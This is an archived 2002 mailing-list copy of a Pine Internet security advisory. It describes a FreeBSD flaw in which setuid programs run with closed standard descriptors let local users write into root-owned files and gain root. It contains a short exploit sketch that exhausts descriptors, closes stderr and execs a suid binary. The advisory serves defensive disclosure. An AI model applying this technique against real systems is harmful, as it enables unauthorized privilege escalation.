Pine Internet Advisory: Setuid application execution may give local root in FreeBSD

From: Patrick Oonk (patrickat_private)
Date: Mon Apr 22 2002 - 01:58:25 PDT

Next message: bert hubert: "Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio"

Previous message: Theo de Raadt: "Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----

 -----------------------------------------------------------------------------
 Pine Internet Security Advisory
 -----------------------------------------------------------------------------
 Advisory ID       : PINE-CERT-20020401
 Authors           : Joost Pol <joostat_private>
 Issue date        : 2002-04-22 
 Application       : Multiple
 Version(s)        : Multiple 
 Platforms         : FreeBSD confirmed, maybe others.
 Vendor informed   : 20020406 
 Availability      : http://www.pine.nl/advisories/pine-cert-20020401.txt
 -----------------------------------------------------------------------------

Synopsis

	It is possible for a local user to execute a suid application with 
	stdin, stdout or stderr closed.

Impact

	HIGH. Local users should be able to gain root privileges. 

Description

	Consider the following (imaginary) suid application:

	-- begin of imaginary code snippet

		FILE * f = fopen("/etc/root_owned_file", "r+");

		if(f) {
		
			fprintf(stderr, "%s: fopen() succeeded\n", argv[0]);

			fclose(f);
		}

	-- end of imaginary code snippet
		
	Now, consider the following (imaginary) exploit:

	-- begin of imaginary exploit snippet

		while(dup(1) != -1); 

		close(2);

		execl("/path/to/suid_application",
		      "this text will endup in the root_owned_file", 0);

	-- end of imaginary exploit snippet

	Exploitation has been confirmed using the S/KEY binaries. 

Solution

	FreeBSD source trees have been updated on the 21th of april 2002. 
	Please cvsup.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBPMPQffplhmN+UTQRAQE/bggAwkCUhmkv5QUVVE/pUcHIkN26Txa0Pv6T
4q4Iu4TKi6YhJYJ5Jlh0YhlgkurVE7/qAokvxEfdgHQTR68uCPJhDQTKp/9uJ+PG
qt+InMh7NHaOdIvEjcH74D9zxEC14uH+SrXmmmZno601d9mLcBZyKs0ZgOFCBnJr
QToyEgs709xtnbs5OP8iPxn6dhZADMPM9NJbtU2EvkSUqRoDB8H1awUAANI/8RzJ
4HOLDkFOkYFaNFvbYMULStGU5nH9OTHtOuTw7decgHBK6h9H8FhYf8Yn2hMq8wf0
p8/v5m535gPHqoX9HWvfMw2LdIr36mol5K9br9033XrOdIG5itn5aQ==
=AMED
-----END PGP SIGNATURE-----

-- 
 patrick oonk - pine internet - patrickat_private - www.pine.nl/~patrick
 T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl 
 PGPid A4E74BBF  fp A7CF 7611 E8C4 7B79 CA36  0BFD 2CB4 7283 A4E7 4BBF
 Note: my NEW PGP key is available at http://www.pine.nl/~patrick/
 Excuse of the day: it has Intel Inside

Next message: bert hubert: "Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio"
Previous message: Theo de Raadt: "Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Apr 22 2002 - 14:49:51 PDT